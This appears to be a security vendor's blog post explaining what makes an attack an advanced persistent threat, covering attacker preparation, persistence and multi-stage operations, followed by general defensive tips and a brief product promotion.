By definition, an advanced persistent threat (APT) is a prolonged, targeted attack on a specific victim with the intention to compromise their system and gain information from or about that target.
About a decade ago, the term was mostly used for state-sponsored threat actors. I used threat actors here, because in the state where they operated from and for, they are not seen as cybercriminals. That perception changes, of course, when you’re on the receiving end of such an attack.
When these threats were first identified, their targets were governments and military organizations. Nowadays, the target can be any person, organization or business. We commonly see attacks on healthcare, telecoms, finance, MSPs, SaaS platforms, and supply chain providers.
“APT” is often used as a dramatic label for any serious breach, even if it was short‑lived or opportunistic. So, let’s break down the name to see what really qualifies as an APT.
Advanced
Advanced does not necessarily mean Hollywood‑level hacking, but it does mean the attackers are deliberate and well prepared. They often combine several techniques: buying or discovering new, unknown software flaws (so‑called zero‑day vulnerabilities), abusing old but unpatched bugs, and crafting very convincing phishing emails that look like genuine messages from colleagues or partners. They may also use legitimate admin tools already present in the network, which makes their activity harder to spot because it looks like normal IT work, so-called LOLbins (Living Off the Land Binaries).
In practice, “advanced” is less about using the fanciest tool and more about choosing the right mix of tools and tactics for a specific victim. An APT group might spend weeks studying a target’s people, systems, and suppliers and then analyze those data with help of an AI. That way, when they finally make a move, it has the highest chance of working on the first try.
Persistent
Persistence is what makes APTs so dangerous. These attackers don’t care about a quick hit‑and‑run raid. They want to break in, stay inside, and keep coming back for as long as access is useful to them. If defenders discover their activity and kick them out of one system, they may use another back door they prepared earlier, or will simply regroup and look for a new way in.
Being persistent also means they move slowly and quietly. Attackers may spend months exploring the network, creating multiple hidden entry points, and regularly checking back in to see what new data has appeared that is worth stealing. From the defender’s point of view, this turns the incident from a single event into an ongoing campaign. You have to assume the attackers will try again, even after you think you have removed them.
Threat
The word threat doesn’t imply that only one kind of malware is involved. An APT usually includes several types of attacks. It refers to the whole operation: the people, their tools, and their infrastructure, not just one piece of malware.
An APT may involve phishing, exploiting vulnerabilities, installing remote access tools, and stealing or abusing passwords. Together, these activities form the threat to the organization’s systems and data.
Behind the threat is a team with a goal (for example, stealing sensitive designs, spying on communications, or preparing for future disruption), and with the patience and resources to keep pushing until they reach that goal.
How to stay safe
To avoid falling victim to an APT, assume you could be up against a formidable opponent.
- Be cautious with unexpected emails, messages and attachments, not just at work.
- Use passkeys where possible and strong, unique passwords where not, and a password manager.
- Turn on multi‑factor authentication (MFA) wherever possible.
- Keep your software and hardware updated, especially public-facing network equipment.
- Use an up-to-date, real-time anti-malware solution, preferably with a web protection component.
- Take note of anything out‑of‑the‑ordinary activity and report it, as even small details can turn out to be important later.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.